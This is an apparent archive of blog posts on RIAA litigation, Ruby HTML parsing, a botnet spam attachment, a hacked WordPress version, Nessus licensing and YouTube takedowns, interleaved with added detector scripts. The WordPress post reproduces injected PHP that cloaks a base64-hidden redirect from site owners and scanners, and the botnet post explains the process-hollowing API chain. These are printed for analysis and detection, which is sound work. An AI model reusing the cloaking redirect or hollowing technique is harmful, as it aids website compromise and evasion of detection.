RIAA files suit against hospitalized teenager and wins

According to various reports [1,2,3], the RIAA won a lawsuit against Ciara Sauro because she was unable to respond to the court filings in time. The unnamed judge entered a verdict for $8,000. The RIAA brought the case over 10 songs.

Why RIAA tactics are unconstitutional

Charlie Nesson explains in this article just how far the RIAA has perverted the American legal system.
It should be noted that the $750 statutory minimum is just that: a minimum. Statutory damages can go as high as $30,000 per infringement, and up to $150,000 per infringement where the infringement is found to be willful (17 U.S.C. § 504(c)).
The defendant in this trial has had to endure 7 years of legal troubles over allegedly downloading 7 songs. This is something to think about: the RIAA is asking for over $1M because of downloaded songs with a market value of roughly $7. I have to agree with Pamela Samuelson that damages of at most 3x actual value should apply to crimes of this nature. Not only is this proportional to the actual harm, it would also force the RIAA to go after higher-stakes players who are actually reproducing physical copies of CDs.

A summarized version exists here.

Hpricot Workaround for ASPX viewstate

I’ve switched over to Hpricot for HTML parsing in my various Ruby projects. This was a long time coming and the performance is impressive. I happened to catch a page with ASPX viewstate on it and was faced with the following error:

ran out of buffer space on element

There are various pages out there which detail the workaround. The buffer cap reportedly exists so that the parser cannot consume all the memory on the machine while buffering a single element, and an ASP.NET __VIEWSTATE hidden field can easily be hundreds of kilobytes of base64 in one attribute value. The workaround is to raise the buffer:

Hpricot.buffer_size = 262144
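Rather than hard-coding 262144, the helper below (an added example, not code from the original post or from Hpricot) sizes the buffer from the document actually being parsed and refuses documents whose largest element would need an unreasonable buffer, so the workaround does not turn into a memory-exhaustion bug on a hostile page. `Hpricot.buffer_size=` is the real setting; `DEFAULT_BUFFER`, `MAX_BUFFER`, the helper names and the sample markup are this example's own assumptions.

```ruby
# Added example, not from the original post: pick Hpricot's buffer size from
# the document being parsed instead of hard-coding 262144, and refuse
# documents whose single largest element would need an unreasonable buffer.
# Hpricot.buffer_size= is the real setting; DEFAULT_BUFFER and MAX_BUFFER are
# this example's own assumptions.
DEFAULT_BUFFER = 16_384            # assumed to match Hpricot's built-in default
MAX_BUFFER     = 4 * 1024 * 1024   # assumption: refuse elements larger than 4 MiB

# Length of the longest quoted attribute value in the raw markup. An ASP.NET
# page's __VIEWSTATE hidden input is usually the largest element by far, and
# Hpricot buffers a whole element while tokenizing it, so this is a lower
# bound on the buffer the parser needs.
def longest_attribute_value(html)
  html.scan(/=\s*(?:"([^"]*)"|'([^']*)')/)
      .map { |dq, sq| (dq || sq).length }
      .max || 0
end

# Smallest power-of-two multiple of DEFAULT_BUFFER that fits the largest
# attribute value; raises instead of growing past MAX_BUFFER so a hostile page
# cannot force an arbitrarily large allocation.
def required_buffer_size(html, default: DEFAULT_BUFFER, cap: MAX_BUFFER)
  need = longest_attribute_value(html)
  return default if need < default
  raise ArgumentError, "element of #{need} bytes exceeds buffer cap of #{cap}" if need > cap

  size = default
  size *= 2 while size <= need
  size
end

# Parse with Hpricot after sizing the buffer. The gem is required lazily so
# the sizing helpers above stay usable without it installed.
def parse_with_hpricot(html)
  require 'hpricot'
  Hpricot.buffer_size = required_buffer_size(html)
  Hpricot(html)
end

# Constructed sample: a form carrying a 40,000-byte __VIEWSTATE value, larger
# than DEFAULT_BUFFER, so the chosen size has to grow to 65,536.
SAMPLE_ASPX = <<~HTML
  <form method="post" action="default.aspx">
    <input type="hidden" name="__VIEWSTATE" value="#{'A' * 40_000}" />
  </form>
HTML

puts "buffer needed for sample: #{required_buffer_size(SAMPLE_ASPX)}" if $PROGRAM_NAME == __FILE__
```

Call `parse_with_hpricot(html)` in place of `Hpricot(html)`; the cap is the part worth keeping even if you prefer a fixed size, since whatever limit you pick is the amount of memory one untrusted page can make the parser hold for a single element.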

Federal Judge holds that people cannot be identified by IP address

Judge Nancy Gertner held that a person cannot be readily identified merely by an IP address with any “reasonable degree of technical certainty”. This is something that most of the technical community has argued for years, as the RIAA made countless fishing expeditions using universities as unwitting accomplices: an address behind a dorm NAT or a shared wireless router is used by many people at once, and DHCP moves it between hosts over time. It is refreshing to see a judge at the Federal level understand this concept.

“[T]he Court finds that compliance with the subpoena as to the IP addresses represented by these Defendants would expose innocent parties to intrusive discovery,”

Crime does occur on the Internet. However, for the last few years many of us have watched with horror as the RIAA violated due process and reasonable expectations of privacy while trying to prosecute these crimes. This author hopes that in the near future the RIAA will conform to the laws of this country by using actual law enforcement instead of unlicensed private investigators, and by petitioning the court with actual evidence instead of the equivalent of a “lead”.

Clearly the weight of the judicial system is starting to tilt back in favor of the people, but it is too soon to celebrate. No judge has yet stepped up to declare the statutory damages of 17 U.S.C. § 504(c) unconstitutional. With statutory damages of up to $30,000 per infringement (and up to $150,000 for willful infringement under § 504(c)(2)), defendants absolutely must have representation in the courts. Yet the RIAA’s end run around this crucial aspect perverts that which is “fundamental to the American scheme of justice.”

hi, botnet Jack here

I received what was obviously spam this morning with the subject “VideoTube.com: The Best!”
Because I work on the Youtomb project this sort of caught my attention. The message simply read “eX-eX-eX girlfriend!” and there was a zipped attachment. I detached the file and moved it to one of my test boxes. Once there I unzipped it and ran “strings” on it.

It is definitely some sort of Windows-based botnet package, but I don’t have the time to really investigate it. I’m leaving the strings output behind to help anyone who runs into this today or in the near future. The first line of intelligible strings output did make me laugh:

hi, botnet Jack here
CloseHandle
CreateProcessA
ExitProcess
GetEnvironmentVariableA
GetModuleFileNameA
GetShortPathNameA
GetThreadContext
ReadProcessMemory
ResumeThread
SetThreadContext
VirtualAllocEx
WriteProcessMemory
lstrcatA
lstrcpyA
KERNEL32.dll
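The import names in that dump are worth more than a laugh: CreateProcessA, GetThreadContext, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread together are the API chain a process-hollowing (“RunPE”) loader uses to start a victim process suspended, overwrite its image with a hidden payload and resume it. The script below is an added example, not part of the original post, that scores a `strings` dump for that chain; the API names are the ones the dump lists, while the role grouping, the function names and the benign comparison dump are this example's own.

```ruby
require 'set'

# Added example (not part of the original post): score a `strings` dump for the
# import set that process-hollowing ("RunPE") loaders need. The API names are
# the ones the post's dump lists; the grouping into roles is this example's own.
HOLLOWING_ROLES = {
  spawn_suspended: %w[CreateProcessA CreateProcessW],  # start a victim (often a copy of itself) suspended
  read_context:    %w[GetThreadContext],                # grab the suspended thread's registers
  alloc_remote:    %w[VirtualAllocEx],                  # carve out space in the victim
  write_remote:    %w[WriteProcessMemory],              # copy the hidden payload image in
  write_context:   %w[SetThreadContext],                # point the entry register at the payload
  resume:          %w[ResumeThread],                    # let the victim run the payload
}.freeze

# One identifier per line, as `strings` prints them.
def imported_names(strings_output)
  strings_output.each_line.map(&:strip).reject(&:empty?).to_set
end

# Which imported API fills each role; nil for a role with no matching import.
def hollowing_indicators(strings_output)
  names = imported_names(strings_output)
  HOLLOWING_ROLES.each_with_object({}) do |(role, apis), found|
    found[role] = apis.find { |api| names.include?(api) }
  end
end

# True only when every role is covered: the whole chain, not one API in
# isolation (WriteProcessMemory alone is also used by debuggers and installers).
def looks_like_process_hollowing?(strings_output)
  hollowing_indicators(strings_output).values.none?(&:nil?)
end

# The import names the post's `strings` run printed, reproduced as input.
POSTED_STRINGS = <<~TXT
  hi, botnet Jack here
  CloseHandle
  CreateProcessA
  ExitProcess
  GetEnvironmentVariableA
  GetModuleFileNameA
  GetShortPathNameA
  GetThreadContext
  ReadProcessMemory
  ResumeThread
  SetThreadContext
  VirtualAllocEx
  WriteProcessMemory
  lstrcatA
  lstrcpyA
  KERNEL32.dll
TXT

# Constructed benign dump: process housekeeping only, no remote-memory writes.
BENIGN_STRINGS = <<~TXT
  CloseHandle
  ExitProcess
  GetModuleFileNameA
  lstrcpyA
  KERNEL32.dll
TXT

if $PROGRAM_NAME == __FILE__
  hollowing_indicators(POSTED_STRINGS).each { |role, api| puts "#{role}: #{api || '-'}" }
  puts "process hollowing chain present: #{looks_like_process_hollowing?(POSTED_STRINGS)}"
end
```

One caveat when reading a dump like this: import names only show up in `strings` because the binary's import table is in the clear. A packed dropper typically imports little beyond LoadLibrary and GetProcAddress and resolves the rest at runtime, so a clean result from this check says nothing about a packed sample.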

MBTA security fail

In light of the events of last week, I couldn’t help but be amused by this dialog box floating on a turnstile display in the Central Square T stop.

EDIT: my cell phone camera takes lousy pictures. The text reads:
Program: D:/FOAAA/
File: sprintf.c
Line: 94


WordPress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads-up on a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations through a recently announced vulnerability. More details in a well-written write-up here.

The code snippets from a digitalpoint.com forum thread use base64 encoding to hide the true redirect destination:


<?php
// Fire only for visitors whose Referer names a search engine ...
$seref = array("google", "msn", "live", "altavista", "ask",
               "yahoo", "aol", "cnn", "weather", "alexa");

$ser = 0;
foreach ($seref as $ref) {
    if (strpos(strtolower($_SERVER['HTTP_REFERER']), $ref) !== false) {
        $ser = "1";
        break;
    }
}

// ... and who carry no cookies at all (so never a logged-in site owner).
if ($ser == "1" && sizeof($_COOKIE) == 0) {
    // "YW55cmVzdWx0cy5uZXQ=" decodes to anyresults.net
    header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
    exit;
}
?>

This code shows yet another trend we’ve noticed at stopbadware.org: only exploiting those requests which come directly from a search engine. The site owner, who reaches the site by typing its URL and usually carries a login cookie, never triggers the redirect, and neither does a scanner that fetches the page without a search-engine Referer. We can only conclude this is to prevent (or delay) detection and maximize infection duration.
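Two checks follow from that: decode every `base64_decode()` literal in a suspect PHP file so the real destination is visible, and test the gate the way the injected code evaluates it (search-engine Referer, zero cookies) instead of the way you normally browse your own site. The script below is an added example and is not code from the write-up, from stopbadware.org or from the attackers; the snippet from the forum is embedded as test input, and the function names, the benign comparison file and the reporting format are this example's own.

```ruby
require 'base64'

# Added example (not part of the write-up or the injected code): scan PHP source
# for the referer-cloaked redirect pattern shown above. Function names are this
# example's own.

# Search-engine names the injected snippet matches against the Referer.
SEARCH_ENGINE_TOKENS = %w[google msn live altavista ask yahoo aol cnn weather alexa].freeze

# Every string literal handed to base64_decode(), decoded, so the report shows
# the real destination rather than an opaque blob. Non-base64 literals are skipped.
def decoded_base64_literals(php)
  php.scan(%r{base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)}).flatten.map do |blob|
    begin
      Base64.strict_decode64(blob)
    rescue ArgumentError
      nil
    end
  end.compact
end

# The three ingredients of the cloaking gate plus whatever the base64 hides.
def cloaking_report(php)
  {
    referer_gate: php.match?(/HTTP_REFERER/) &&
                  SEARCH_ENGINE_TOKENS.any? { |t| php.include?(%("#{t}")) },
    cookie_gate:  php.match?(/sizeof\s*\(\s*\$_COOKIE\s*\)\s*==\s*0|empty\s*\(\s*\$_COOKIE\s*\)/),
    redirect:     php.match?(/header\s*\(\s*["']Location:/i),
    decoded:      decoded_base64_literals(php),
  }
end

# Flag only the full pattern: referer gate + cookie gate + redirect + hidden literal.
def cloaked_redirect?(php)
  r = cloaking_report(php)
  r[:referer_gate] && r[:cookie_gate] && r[:redirect] && !r[:decoded].empty?
end

# The same gate as the injected code evaluates it, so you can see which visits
# trigger the redirect: referer is the Referer header (nil when absent),
# cookie_count is the size of $_COOKIE.
def redirect_fires?(referer, cookie_count)
  from_search = SEARCH_ENGINE_TOKENS.any? { |t| referer.to_s.downcase.include?(t) }
  from_search && cookie_count.zero?
end

# The injected snippet from the forum post, reproduced as scanner input.
INJECTED_SNIPPET = <<~'PHP'
  $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
  $ser=0;
  foreach($seref as $ref)
    if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false) { $ser="1"; break; }
  if($ser=="1" && sizeof($_COOKIE)==0) {
    header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
    exit;
  }
PHP

# Constructed benign file for comparison.
BENIGN_PHP = "<?php echo 'hello'; ?>"

if $PROGRAM_NAME == __FILE__
  puts cloaking_report(INJECTED_SNIPPET).inspect
  puts "owner visit (no referer, session cookie) redirected: #{redirect_fires?(nil, 1)}"
  puts "search visitor (google referer, no cookies) redirected: #{redirect_fires?('http://www.google.com/search?q=x', 0)}"
end
```

`redirect_fires?` makes the detection-evasion point concrete: the owner's own visits (no search-engine Referer, a WordPress login cookie) never redirect, so when checking a site by hand, fetch it with a Google Referer and no cookies, which is the only combination the injected code acts on.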

Chinese hackers political assault on the blogosphere

Disturbing news of a hacked blogger in China. This is not a simple drive-by-download (DBD) setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street but also managed to infiltrate her Skype account.

Tenable alters Nessus plug-in licensing. Still not Open

Dear Nessus Community,

On behalf of Tenable Network Security, we would like to thank you for making Tenable’s Nessus® vulnerability scanner the most widely used scanner in the world. Over the last five years, we have seen Nessus grow globally to over 5 million downloads and we have been there every step of the way. The core Nessus engine is powered by our world-class vulnerability research content which includes over 20,000 plugins, enhanced features such as IPv6 scanning, free mailing lists, online search tools and free clients. Nessus has become not only a popular tool for conducting security audits but we have extended its capabilities to conduct agent-less patch audits and configuration audits, as well as locating sensitive data. Looking forward, we plan to further increase functionality, such as SMBv2 support to better audit Windows 2008 and Windows Vista, and further expand our abilities to conduct even more comprehensive vulnerability and configuration audits.

In the process, the Nessus scanning engine has been provided to our rapidly growing community as a free download with research content licensed through two plugin subscriptions. Our Nessus users know these as the “Registered Feed” and the “Direct Feed” subscriptions. These subscriptions have been available for over three years and have been utilized by countless individuals, consultants, companies, governments and other organizations.

We continually interact with the Nessus community and review our capabilities to ensure Nessus continues to meet and exceed the needs of its users. Since creating and releasing the subscriptions, two distinct user groups emerged. They are the home user and the commercial user. To better reflect the needs of our community, we have decided to update our Subscription licensing policy and are announcing the planned change (as outlined below and accompanied by a FAQ) that will go into effect on July 31st, 2008.

First, we will continue to enable all users to download Nessus for free.

Second, due to computers and personal networks having become ubiquitous in homes around the world, Tenable will launch a “HomeFeed” with all Nessus vulnerability plugin updates for home users at no charge and with no delay. We are excited to offer the latest vulnerability checks for personal, non-commercial use and strongly encourage home users to audit their computers and networks for the newest security flaws.

Finally, Tenable’s “Direct Feed” will be re-named to the “ProfessionalFeed” and the “Registered Feed” will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and patch audits, configuration and content audits and commercial support for their Nessus 3 installation. The ProfessionalFeed will serve as Tenable’s commercial subscription and will be required for individuals and organizations that want to use Tenable’s Nessus plugins commercially.

The decision to alter the licensing policy is the result of significant deliberation and will benefit both home users and commercial users. The change will ensure our ability to invest in the future roadmap for Nessus and to expand our research, support and training capabilities to serve our growing community. We realize this may affect some individuals, corporations and organizations that use the currently available “Registered Feed” in production audits and commercial services. Because of this, Tenable is offering a 25 percent rebate for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until July 31, 2008 only when purchased through Tenable’s e-commerce site.

Additionally, we understand that there are those in the Nessus community that serve broad social and educational objectives and we want to make certain that qualified charitable and information security teaching/training organizations have access to the ProfessionalFeed free of charge. To this end, Tenable will provide ProfessionalFeed subscriptions to charity and teaching/training organizations at no cost for those that qualify.

As always, Tenable will continue to perform the in-depth research, testing and development to keep Nessus the leading vulnerability and network auditing tool available to both home and professional users.

excerpt directly from Tenable Network Security, Inc.

Anti-Scientology videos taken down en masse on YouTube

The other day I received an email about a new Anonymous vs. Scientology dispute on YouTube. The Enturbulation forum reported that Tory Christman, a very vocal critic of Scientology, had her YouTube account suspended. This time it looks as though Mark Bunker (Wise Beard Man) has had many of his videos taken down as Terms of Service violations. Roughly 90 of his videos appear to be down at this time. You can view these takedowns as we discover them at Youtomb.
[disclosure: I am an active team member of the Youtomb project]
[update: the Enturbulation forum has also confirmed this account suspension in the same thread, on page 21]

I’ve created a CSV of the videos affected here.
Because WordPress won’t let me upload .CSV I have named the file .txt. Rename it to .CSV and use your favorite spreadsheet software to view it.

Given the history of Mark Bunker, one has to wonder what Scientology told YouTube in order to have his account shut down. As one can see from the data collected, all the public is told is that there was a Terms of Service violation. We have no idea what those violations might be.